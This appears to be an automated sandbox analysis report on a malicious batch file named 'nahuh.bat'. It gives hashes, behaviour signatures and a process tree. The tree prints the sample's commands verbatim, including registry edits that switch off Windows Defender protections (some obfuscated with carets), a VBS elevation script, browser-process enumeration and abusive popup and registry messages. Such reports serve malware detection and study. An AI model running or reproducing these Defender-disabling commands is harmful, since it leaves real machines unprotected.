Analysis

  • max time kernel
    1473s
  • max time network
    1499s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240704-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    08/07/2024, 04:38

General

  • Target

    nahuh.bat

  • Size

    4KB

  • MD5

    37201a001d693f84dddfe76815e3f869

  • SHA1

    84adbec160a56f4da8f86230744dc8b379891576

  • SHA256

    2aa07e70f8f562504ec8a47426bd141d02889726794a4d1f14f2c4bd52ed594e

  • SHA512

    3649b94893b309c24a4b51f81b5dad26cd8a3f7a4d41e0e1a9c3e9c94b90121a46dbe26acb926ef23ad80dae2ffca0cba37fb053050e880d5b92df7fa39c57fe

  • SSDEEP

    96:HHQGHWr2H6HsHo3lH93HoCXNLIFfZITIxmc:d2yaMI3ld3tXNCfZITIv

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\nahuh.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4600
    • C:\Windows\system32\cscript.exe
      cscript "C:\Users\Admin\AppData\Local\Temp\runadmin.vbs"
      2⤵
      PID:3916
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      2⤵
      PID:3848
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Mic^rosoft\Windows Defender" /v "DisableR^ealtimeMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      PID:2260
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:5104
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableO^nAccessProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:2572
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:2956
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
      2⤵
      PID:2988
    • C:\Windows\system32\msg.exe
      msg * "fuck u"
      2⤵
      PID:488
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "RegisteredOwner" /t REG_SZ /d "I hate nwords" /f
      2⤵
      PID:1800
    • C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq chrome.exe" /FI "IMAGENAME eq firefox.exe" /FI "IMAGENAME eq msedge.exe"
      2⤵
      • Enumerates processes with tasklist
      • Suspicious use of AdjustPrivilegeToken
      PID:908
    • C:\Windows\system32\find.exe
      find /I "chrome.^exe"
      2⤵
      PID:460
    • C:\Windows\system32\msg.exe
      msg * "OPEN THE WEBSITE"
      2⤵
      PID:2856
    • C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      2⤵
      • Delays execution with timeout.exe
      PID:1096

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\runadmin.vbs

    Filesize

    132B

    MD5

    e27735da1df9429e609b8bf50f0e5f27

    SHA1

    1bd24f94839cc7100fd174d9bb31d78b4d4efa6e

    SHA256

    9e11ee22767f011c35f7ac05334205835b13241210dced3abacc9322452987be

    SHA512

    c943b72c8554803ae2cea74153fb8c89558ac69daab725d8a2ffac230b536f917715b5d0ed82bd9c9df3a2ba85f1447d01940b7881fabfc642b498669e42f1a1